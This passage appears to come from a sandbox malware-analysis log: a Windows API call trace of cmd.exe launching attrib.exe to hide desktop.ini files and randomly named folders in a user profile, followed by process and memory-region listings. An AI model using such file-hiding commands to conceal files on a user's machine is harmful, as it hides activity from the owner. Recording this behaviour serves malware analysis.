lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.260] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.260] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.287] _close (_FileHandle=4) returned 0 [0128.288] FindNextFileW (in: hFindFile=0x43e7e0, lpFindFileData=0x24ef90 | out: lpFindFileData=0x24ef90) returned 0 [0128.288] GetLastError () returned 0x12 [0128.288] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.289] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0128.292] _close (_FileHandle=3) returned 0 [0128.292] GetConsoleTitleW (in: lpConsoleTitle=0x24f3c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.292] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.292] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.293] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.293] GetLastError () returned 0x2 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.293] GetLastError () returned 0x2 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.293] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.294] GetLastError () returned 0x2 [0128.294] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.294] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.294] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.294] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.294] GetConsoleTitleW (in: 
lpConsoleTitle=0x24f15c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.294] InitializeProcThreadAttributeList (in: lpAttributeList=0x24efe4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f0ac | out: lpAttributeList=0x24efe4, lpSize=0x24f0ac) returned 1 [0128.294] UpdateProcThreadAttribute (in: lpAttributeList=0x24efe4, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f0a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24efe4, lpPreviousValue=0x0) returned 1 [0128.294] GetStartupInfoW (in: lpStartupInfo=0x24efa0 | out: lpStartupInfo=0x24efa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0128.294] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.294] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f040*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f08c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessInformation=0x24f08c*(hProcess=0x4c, hThread=0x50, 
dwProcessId=0x324, dwThreadId=0x328)) returned 1 [0128.296] CloseHandle (hObject=0x50) returned 1 [0128.296] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.296] GetEnvironmentStringsW () returned 0x442f08* [0128.296] FreeEnvironmentStringsW (penv=0x442f08) returned 1 [0128.296] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0128.338] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24ef80 | out: lpExitCode=0x24ef80*=0x0) returned 1 [0128.338] CloseHandle (hObject=0x4c) returned 1 [0128.338] _vsnwprintf (in: _Buffer=0x24f0c8, _BufferCount=0x13, _Format="%08X", _ArgList=0x24ef8c | out: _Buffer="00000000") returned 8 [0128.338] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.338] GetEnvironmentStringsW () returned 0x442f08* [0128.338] FreeEnvironmentStringsW (penv=0x442f08) returned 1 [0128.338] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.338] GetEnvironmentStringsW () returned 0x442f08* [0128.339] FreeEnvironmentStringsW (penv=0x442f08) returned 1 [0128.339] DeleteProcThreadAttributeList (in: lpAttributeList=0x24efe4 | out: lpAttributeList=0x24efe4) [0128.339] GetConsoleTitleW (in: lpConsoleTitle=0x24f3c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.339] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.339] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.339] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.339] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | 
out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.339] GetLastError () returned 0x2 [0128.339] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.340] GetLastError () returned 0x2 [0128.340] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.340] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.340] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.340] GetLastError () returned 0x2 [0128.340] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.340] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.340] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.340] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.340] GetConsoleTitleW (in: lpConsoleTitle=0x24f15c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.340] InitializeProcThreadAttributeList (in: lpAttributeList=0x24efe4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f0ac | out: lpAttributeList=0x24efe4, lpSize=0x24f0ac) returned 1 [0128.340] UpdateProcThreadAttribute (in: lpAttributeList=0x24efe4, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f0a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24efe4, lpPreviousValue=0x0) returned 1 [0128.341] GetStartupInfoW (in: 
lpStartupInfo=0x24efa0 | out: lpStartupInfo=0x24efa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0128.341] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.341] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f040*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f08c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessInformation=0x24f08c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x7ac, dwThreadId=0x488)) returned 1 [0128.343] CloseHandle (hObject=0x4c) returned 1 [0128.343] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.343] GetEnvironmentStringsW () returned 0x443a60* [0128.343] FreeEnvironmentStringsW (penv=0x443a60) returned 1 [0128.343] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0128.380] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24ef80 | out: lpExitCode=0x24ef80*=0x0) returned 1 [0128.380] CloseHandle (hObject=0x50) returned 1 [0128.380] _vsnwprintf (in: _Buffer=0x24f0c8, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x24ef8c | out: _Buffer="00000000") returned 8 [0128.380] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.380] GetEnvironmentStringsW () returned 0x443a60* [0128.380] FreeEnvironmentStringsW (penv=0x443a60) returned 1 [0128.380] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.380] GetEnvironmentStringsW () returned 0x443a60* [0128.380] FreeEnvironmentStringsW (penv=0x443a60) returned 1 [0128.380] DeleteProcThreadAttributeList (in: lpAttributeList=0x24efe4 | out: lpAttributeList=0x24efe4) [0128.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.380] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.381] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.381] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.381] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.381] SetConsoleInputExeNameW () returned 0x1 [0128.381] GetConsoleOutputCP () returned 0x1b5 [0128.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.381] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.381] exit (_Code=0) Process: id = "83" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x87c" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT 
AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10547 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10548 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10549 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10550 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10551 start_va = 0xf40000 end_va = 0xf46fff entry_point = 0xf40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10552 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10553 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10554 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10555 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 10556 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10557 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10558 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10559 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10560 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 10561 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 10562 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10563 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10564 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10565 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10566 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10567 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = 
"advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10568 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10569 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10570 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10571 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10572 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10573 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10574 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 10575 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10576 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Thread: id = 140 os_tid = 0x7cc Process: id = "84" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x87c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10612 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10613 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10614 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10615 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10616 start_va = 0x210000 end_va = 0x216fff entry_point = 0x210000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10617 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10618 start_va = 0x77470000 end_va = 
0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10619 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10620 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10621 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10622 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10623 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10624 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = 